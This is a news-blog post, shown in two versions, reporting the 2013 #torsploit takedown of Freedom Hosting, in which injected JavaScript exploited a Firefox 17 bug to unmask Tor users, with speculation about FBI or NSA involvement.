BytegeistCommunity

Government Software Suspected of Compromising Tor Anonymity in Porn Hosting Takedown

Tor Logo

On Sunday night, a number of “hidden service addresses” began disappearing from the Tor network, now being tagged as #torsploit.

Many of these addresses were hosted by a company called Freedom Hosting. Concurrently,  the Irish Independent reported the FBI was seeking the extradition of Eric Eoin Marques, founder of Freedom Hosting, alleging he was “the largest facilitator of child porn on the planet.”

In response, Tor blogger phobos published a post indicating that Freedom Hosting was in no way associated with the Tor project, but rather ran a “hidden service” which was reachable only through the Tor network:

Anyone can run hidden services, and many do. We use them internally at The Tor Project to offer our developers anonymous access to services such as SSH, IRC, HTTP, and our bug tracker. Other organizations run hidden services to protect dissidents, activists, and protect the anonymity of users trying to find help for suicide prevention, domestic violence, and abuse-recovery. Whistleblowers and journalists use hidden services to exchange information in a secure and anonymous way and publish critical information in a way that is not easily traced back to them. The New Yorker’s Strongbox is one public example.

And therein lies the rub.  While hidden services are a critical part of many systems used to protect the legitimate anonymous activity of those whose lives depend on it, they are also naturally attractive to those seeking to exploit them for criminal activity.

The software used on Freedom Hosting servers was likely breeched in such a way that it injected a piece of javascript in the web pages delivered to users, which was then used to load malicious HTML code to infect the user’s computer.

The post also suggests that this may have been possible due to a bug in the Firefox 17 browser.  The Tor Browser is based on the Firefox browser.

Apparently the code checks to see if a user is using Firefox 17. If so, the user is redirected to a site outside the Tor network that can identify the true address of those visiting it.

Security expert Brian Krebs reports that this vulnerability was fixed in Firefox 22 and Firefox ESR 17.0.7, according to Mozilla.

“People who are on the latest supported version of Firefox are not at risk,” says Krebs.

Reverse engineer Vlad Tsyrklevich has posted an annotation and brief analysis of the payload used by the Tor Browser Bundle exploit.

“Because this payload does not download or execute any secondary backdoor or commands it’s very likely that this is being operated by an LEA [law enforcement agency] and not by blackhats,” he concludes.

Wired notes that the code is “likely the first sample captured in the wild of the FBI’s ‘computer and internet protocol address verifier,’ or CIPAV,” software that the FBI has been using since 2002 against “hackers, online sexual predators, extortionists and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.”

Because the software has been used sparingly in the past, there has never been available for analysis and addition to anti-virus databases.

“Now that there’s a sample of the code,” notes Wired, “will anti-virus companies start detecting it?”

Freedom Hosting has, in the past, been targeted by members of Anonymous, who launched denial of service attacks to prevent child pornographers from operating on the Tor network.

Nobody can argue with the FBI’s legitimate pursuit of removing child pornographers from the internet.  However, in a country that equates whistleblowers with terrorists and charges them with espionage and aiding the enemy, there is also serious concern in the tech community today that the anonymity provided by the Tor network can now be compromised in ways that jeopardize secure legitimate communications.

Update 1:36 PM EST: According to Baneki Privacy Labs (h/t DSWright) the address that the malware is redirecting traffic to is owned by defense contractor SAIC and allocated to the NSA, not the FBINSA SAIC address

Cryptocloud speculates that this could be part of the NSA’s PRISM program:

What is an NSA IP address doing as a command & control contact for javascript malware being deployed in the #torsploit attack? That remains to be seen… but we already know that PRISM data has been “jumping the wall” and leaking into other law enforcement hands. Is this an example of further abuse of PRISM’s “national security only” dataset? That appears the most likely explanation, at this point in time.

Color me skeptical, but why would the embattled and disgraced agency just “happen” to leave its fingerprints on a child-porn case just now that could be used to publicly justify both the PRISM program’s existence and secrecy?

Update 2:25 PM EST: Natasha Lennard at Salon says “Those who had thought using Tor exempted them from government dragnets may, in light of #torsploit, think again.”

Note: This post originally indicated the #torsploit software may have originated with the FBI.  It has been edited to reflect that the list of suspects has expanded.

Update 2:31 PM EST: Sean Gallagher at Ars Technica (h/t yellowsnapdragon):

The use of a hard-coded IP address traceable back to the NSA is either a strange and epic screw-up on the part of someone associated with the agency (possibly a contractor at SAIC) or an intentional calling card as some analyzing the attack have suggested. One poster on Cryptocloud’s discussion board wrote, “It’s psyops—a fear campaign… They want to scare folks off Tor, scare folks off all privacy services.”

“Scaring people off” Tor is also a distinct possibility. There have been calls from many quarters to expand the Tor network ever since the Snowden leak, which — even if not completely secure — makes it a whole lot harder for the NSA to do its thing.

CommunityFDL Main Blog

FBI Software Suspected of Compromising Tor Anonymity in Porn Hosting Takedown

Tor Logo

On Sunday night, a number of “hidden service addresses” began disappearing from the Tor network.

Many of these addresses were hosted by a company called Freedom Hosting. Concurrently,  the Irish Independent reported the FBI was seeking the extradition of Eric Eoin Marques, founder of Freedom Hosting, alleging he was “the largest facilitator of child porn on the planet.”

In response, Tor blogger phobos published a post indicating that Freedom Hosting was in no way associated with the Tor project, but rather ran a “hidden service” which was reachable only through the Tor network:

Anyone can run hidden services, and many do. We use them internally at The Tor Project to offer our developers anonymous access to services such as SSH, IRC, HTTP, and our bug tracker. Other organizations run hidden services to protect dissidents, activists, and protect the anonymity of users trying to find help for suicide prevention, domestic violence, and abuse-recovery. Whistleblowers and journalists use hidden services to exchange information in a secure and anonymous way and publish critical information in a way that is not easily traced back to them. The New Yorker’s Strongbox is one public example.

And therein lies the rub.  While hidden services are a critical part of many systems used to protect the legitimate anonymous activity of those whose lives depend on it, they are also naturally attractive to those seeking to exploit them for criminal activity.

The software used on Freedom Hosting servers was likely breeched in such a way that it injected a piece of javascript in the web pages delivered to users, which was then used to load malicious HTML code to infect the user’s computer.

The post also suggests that this may have been possible due to a bug in the Firefox 17 browser.  The Tor Browser is based on the Firefox browser.

Apparently the code checks to see if a user is using Firefox 17. If so, the user is redirected to a site outside the Tor network that can identify the true address of those visiting it.

Security expert Brian Krebs reports that this vulnerability was fixed in Firefox 22 and Firefox ESR 17.0.7, according to Mozilla.

“People who are on the latest supported version of Firefox are not at risk,” says Krebs.

Reverse engineer Vlad Tsyrklevich has posted an annotation and brief analysis of the payload used by the Tor Browser Bundle exploit.

“Because this payload does not download or execute any secondary backdoor or commands it’s very likely that this is being operated by an LEA and not by blackhats,” he concludes.

Wired notes that the code is “likely the first sample captured in the wild of the FBI’s ‘computer and internet protocol address verifier,’ or CIPAV,” software that the FBI has been using since 2002 against “hackers, online sexual predators, extortionists and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.”

Because the software has been used sparingly in the past, there has never been available for analysis and addition to anti-virus databases.

“Now that there’s a sample of the code,” notes Wired, “will anti-virus companies start detecting it?”

Freedom Hosting has, in the past, been targeted by members of Anonymous, who launched denial of service attacks to prevent child pornographers from operating on the Tor network.

Nobody can argue with the FBI’s legitimate pursuit of removing child pornographers from the internet.  However, in a country that equates whistleblowers with terrorists and charges them with espionage and aiding the enemy, there is also serious concern in the tech community today that the anonymity provided by the Tor network can now be compromised in ways that jeopardizes secure legitimate communication.

Previous post

Ten Reasons Why Wisconsin's Budget is “Robin Hood in Reverse”

Next post

Japan Admits Radioactive Water At Fukushima Plant Is An 'Emergency'

Jane Hamsher

Jane Hamsher

Jane is the founder of Firedoglake.com. Her work has also appeared on the Huffington Post, Alternet and The American Prospect. She’s the author of the best selling book Killer Instinct and has produced such films Natural Born Killers and Permanent Midnight. She lives in Washington DC.
Subscribe in a reader

28 Comments